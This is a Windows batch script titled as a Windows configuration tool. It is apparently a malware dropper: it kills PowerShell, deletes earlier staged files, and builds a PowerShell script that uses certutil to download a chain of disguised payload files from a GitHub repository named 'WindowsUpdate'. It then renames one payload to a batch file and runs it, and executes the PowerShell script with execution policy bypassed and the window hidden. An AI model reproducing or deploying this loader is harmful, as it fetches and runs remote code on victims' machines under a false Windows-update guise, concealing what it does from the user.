@echo off 
echo . 
color 1a

title W  I  N  D  O  W  S    C  O  N  F  I  G  U  A  T  I  O  N
echo W  I  N  D  O  W  S    C  O  N  F  I  G  U  A  T  I  O  N 
taskkill /F /IM powershell.exe 

del /F /Q MicrosoftCertificates.uiaq & del /F /Q MicrosoftCertificate.uiaq & del /F /Q MicroCert.bat & del /F /Q 2dir.uiaq & del /F /Q 3cpy.uiaq & del /F /Q 4sch.uiaq & del /F /Q 5re.uiaq & del /F /Q 6looper.uiaq & del /F /Q MiCI.uiaq & del /F /Q MiC.uiaq & del /F /Q MiCI.ps1 & del /F /Q MiC.bat & del /F /Q up-query.altp

echo certutil.exe -urlcache -split -f "https://raw.githubusercontent.com/AlaskaMN/WindowsUpdate/master/MiCert.uiaq" MiCert.uiaq > MiCertII.altp
echo certutil.exe -urlcache -split -f "https://raw.githubusercontent.com/AlaskaMN/WindowsUpdate/master/MiCertII.altp" MiCertII.altp >> MiCertII.altp
echo certutil.exe -urlcache -split -f "https://raw.githubusercontent.com/AlaskaMN/WindowsUpdate/master/MiCertIII.uiaq" MiCertIII.uiaq >> MiCertII.altp

echo certutil.exe -urlcache -split -f "https://raw.githubusercontent.com/AlaskaMN/WindowsUpdate/master/2dir.uiaq" 2dir.uiaq >> MiCertII.altp
echo certutil.exe -urlcache -split -f "https://raw.githubusercontent.com/AlaskaMN/WindowsUpdate/master/3cpy.uiaq" 3cpy.uiaq >> MiCertII.altp
echo certutil.exe -urlcache -split -f "https://raw.githubusercontent.com/AlaskaMN/WindowsUpdate/master/4sch.uiaq" 4sch.uiaq >> MiCertII.altp

echo certutil.exe -urlcache -split -f "https://raw.githubusercontent.com/AlaskaMN/WindowsUpdate/master/5re.uiaq" 5re.uiaq >> MiCertII.altp
echo certutil.exe -urlcache -split -f "https://raw.githubusercontent.com/AlaskaMN/WindowsUpdate/master/6pylooper.uiaq" 6pylooper.uiaq >> MiCertII.altp
echo certutil.exe -urlcache -split -f "https://raw.githubusercontent.com/AlaskaMN/WindowsUpdate/master/6pylooper.altp" 6pylooper.altp >> MiCertII.altp

echo certutil.exe -urlcache -split -f "https://raw.githubusercontent.com/AlaskaMN/WindowsUpdate/master/7looper.uiaq" 7looper.uiaq >> MiCertII.altp
echo certutil.exe -urlcache -split -f "https://raw.githubusercontent.com/AlaskaMN/WindowsUpdate/master/7looper.altp" 7looper.altp >> MiCertII.altp
echo certutil.exe -urlcache -split -f "https://raw.githubusercontent.com/AlaskaMN/WindowsUpdate/master/8opfile.uiaq" 8opfile.uiaq >> MiCertII.altp

echo certutil.exe -urlcache -split -f "https://raw.githubusercontent.com/AlaskaMN/WindowsUpdate/master/up-query.altp" up-query.altp >> MiCertII.altp


echo if (!(Test-Path "C:\Users\Public\MiCertIII.uiaq")) >> MiCertII.altp
echo { >> MiCertII.altp
echo 	echo "not found" >> MiCertII.altp

echo 	exit >> MiCertII.altp
echo } >> MiCertII.altp
echo else >> MiCertII.altp

echo { >> MiCertII.altp
echo 	ren MiCertIII.uiaq MiCertIII.bat >> MiCertII.altp
echo 	start .\MiCertIII.bat >> MiCertII.altp

echo } >> MiCertII.altp
echo exit >> MiCertII.altp

:blue
ren MiCertII.altp MiCertII.ps1
IF EXIST MiCertII.ps1 (
	powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -NoExit -File MiCertII.ps1
	
	exit
) ELSE (
	certutil.exe -urlcache -split -f "https://raw.githubusercontent.com/AlaskaMN/WindowsUpdate/master/MiCertII.altp" MiCertII.altp

	goto blue
)
exit